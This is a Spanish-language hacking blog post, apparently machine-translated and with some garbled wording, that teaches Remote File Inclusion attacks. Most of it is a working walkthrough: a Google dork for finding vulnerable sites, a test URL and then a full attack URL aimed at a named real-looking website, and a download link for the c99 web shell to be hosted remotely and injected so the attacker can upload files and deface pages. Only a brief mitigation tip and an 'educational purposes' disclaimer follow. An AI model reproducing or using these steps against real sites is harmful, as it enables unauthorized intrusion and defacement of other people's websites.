Empecemos
Primero sitios web de Vunerable encuentra usando Google Dork
"Inurl index.php?Page=" su idiota más popular de piratería de RFI
"Inurl index.php?Page=" su idiota más popular de piratería de RFI
Esto muestra todas las páginas que tienen "index.php? Page =" en su URL, ahora para probar si el
el sitio web es vulnerable a la inclusión remota de archivos o no, el pirata informático usa el siguiente comando
www.targetsite.com/index.php?page=www.google.com
Ver ejemplo de este sitio web http://www.cbspk.com
Entonces la URL del hacker se convertirá en
http://www.cbspk.com/v2/index.php?page=http://www.google.com
Si después de ejecutar el comando aparece la página de inicio de Google, entonces el sitio web es
vulnerable a este ataque si no aparece, entonces debería buscar un nuevo objetivo. En mi caso
después de ejecutar el comando anterior en la barra de direcciones, la página de inicio de Google aparece indicando
que el sitio web es vulnerable a este ataque.
Ahora el pirata informático cargaría los shells para obtener acceso. Las cáscaras utilizadas más utilizadas son c99
cáscara o cáscara r57. Usaría c99 shell. Puede descargar c99 shell desde el siguiente enlace:
http://www.sh3ll.org/c99.zip
El pirata informático cargaría primero los shells en un sitio de alojamiento web como ripway.com,
viralhosts.com, 110mb.com u otros hosts gratuitos, etc. Así es como un hacker ejecutaría
las conchas para acceder. Digamos que la URL del shell es http://www.sh3ll.org/c99.txt?
Ahora, así es como un pirata informático ejecutaría el siguiente comando para obtener acceso
http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.t xt?
No olvide agregar "?" después de .txt al final de la URL o, de lo contrario, el shell no se ejecutará. Ahora el
El hacker está dentro del sitio web y puede hacer cualquier cosa con él, puede cargar y desfigurar páginas.
¿Cómo proteger sus sitios web y foros de ataques de inclusión de archivos remotos?
Como somos piratas informáticos éticos, también explicaré a los webmasters que protejan sus sitios web del ataque RFI.
Para protegerse de los ataques de RFI, simplemente asegúrese de que está utilizando scripts actualizados y asegúrese de que el archivo php.ini del servidor tenga register_globals y allow_url_fopen deshabilitados.
Nota: la piratería de sitios web es ilegal, este artículo es solo para fines educativos
Comentarios
Publicar un comentario
Todos sus comentarios seran bienvenidos, no se admiten insultos todo con el debido respeto que se merece cada persona, o de lo contrario seran eliminado cada comentario inrespetuoso hacia los demas. y autores del blog tambien puedes seguirnos en:
Facebook: https://www.facebook.com/groups/HackingTeamCyber/
Grupo de Telegram: https://t.me/TheHackForceOfficial
Canal de Youtube: https://www.youtube.com/channel/UCXy8Lg28OuGuI5Z-2EWJaNA?view_as=subscriber
Canal Vimeo: https://vimeo.com/403136547?activityReferer=1
Red Social Twitter: https://twitter.com/TheHackForce